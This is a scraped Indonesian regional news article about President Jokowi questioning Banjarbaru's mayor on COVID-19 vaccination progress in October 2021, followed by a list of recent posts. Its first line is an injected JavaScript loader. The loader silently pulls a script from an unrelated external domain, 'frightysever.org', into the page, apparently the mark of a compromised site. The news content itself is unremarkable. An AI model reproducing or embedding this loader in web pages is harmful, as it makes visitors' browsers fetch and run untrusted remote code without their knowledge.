(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Jokowi Tanya Capaian Vaksinasi di Banjarbaru, Wali Kota: November Sudah 70 Persen Pak!


KANALKALIMANTAN.COM, BANJARBARU – Pemerintah Kota (Pemko) Banjarbaru terus gencarkan vaksinasi kepada masyarakat kejar herd immunity alias kekebalan komunal.

Menggandeng Kamar Dagang dan Industri (Kadin) dan KNPI Kota Banjarbaru, sebanyak 1.500 vaksin disiapkan guna percepatan vaksinasi di Kota Banjarbaru, Kamis (21/10/2021).

Melalui jumpa virtual dari Balai Pelatihan Kesehatan (Bapelkes) Banjarbaru, Jalan Mistar Cokrokusumo, Wali Kota Banjarbaru Aditya Mufti Ariffin mendengarkan arahan Presiden Joko Widodo (Jokowi) yang berada di Banjarmasin.

Dalam arahannya, Presiden Jokowi menargetkan kepada seluruh provinsi terutama Kalsel dengan target capaian vaksinasi di akhir tahun sudah mencapai 70 persen.

 

Baca juga : Capaian Vaksinasi di Kalsel Rendah, Jokowi: Laporan Gubernur Kalsel Baru 33 Persen

“Pemerintah daerah dibantu Polres dan Kodim untuk segera mempercepat vaksinasi. Agar target 70 persen masyarakat divaksin di akhir tahun tercapai,” pesan Jokowi.

Jokowi berpesan kalau vaksin di daerah habis, maka sesegaranya melapor dan akan dikirimkan stok vaksin baru. Tidak lupa ia meminta kerjasama dengan seluruh pihak terkait, seperti Kepala Daerah, Dandim serta Kapolres untuk capaian target 70 persen di akhir tahun.

Semetara itu capaian vaksinasi di Provinsi Kalimantan Selatan berdasarkan laporan yang diterima Jokowi dari Gubernur Kalsel baru mencapai 33 persen.

Secara bergantian Presiden Jokowi menanyakan capaian vaksinasi di beberapa kabupaten/kota se Kalsel.

 

Baca juga Meriahkan HUT ke-22, DWP HSU Gelar Lomba MC dan Silaturahmi dengan DPW Kalsel

“Kota Banjarbaru,” tanya Jokowi

Ketika giliran Kota Banjarbaru disebut Jokowi, sontak Wali Kota berdiri dan menyampaikan bahwa capaian vaksinasi di Banjarbaru sudah pada angka 56,48 persen.

“Perlu kita laporkan Pak Presiden capaian vaksinasi di Kota Banjarbaru mencapai 56,48 persen untuk dosis pertama dan dosis kedua 35,70 persen,” beber Wali Kota Banjarbaru.

Mendengar pernyataan langsung Wali Kota Aditya, Presiden Jokowi menegaskan untuk akhir tahun sudah harus mencapai 70 persen.

“Berarti akhir tahun bisa mencapai 70 persen?,” tanya Jokowi lagi.

Wali Kota Aditya menjawab dengan tegas bahwa Kota Banjarbaru bisa mencapai 70 persen capaian vaksinasi di bulan November.

 

Baca juga : Sempat Ngadat, Kadinkes Banjarbaru Bayar Insentif Nakes hingga September 2021

“Insyaallah di bulan November sudah 70 persen pak!” jawab Wali Kota Banjarbaru.

Setelah itu, Wali Kota Banjarbaru menyampaikan optimis itu kepada awak media tentang capaian vaksinasi pada November mendatang.

“Insyaallah dari laporan Kadinkes Banjarbaru di pertengahan bulan November sudah mencapai target, dan paling lambat di akhir bulan November sudah 70 persen,” tandasnya. (kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : bie


Desy Arfianty

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

9 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

9 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

10 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

14 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

16 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

16 jam ago

This website uses cookies.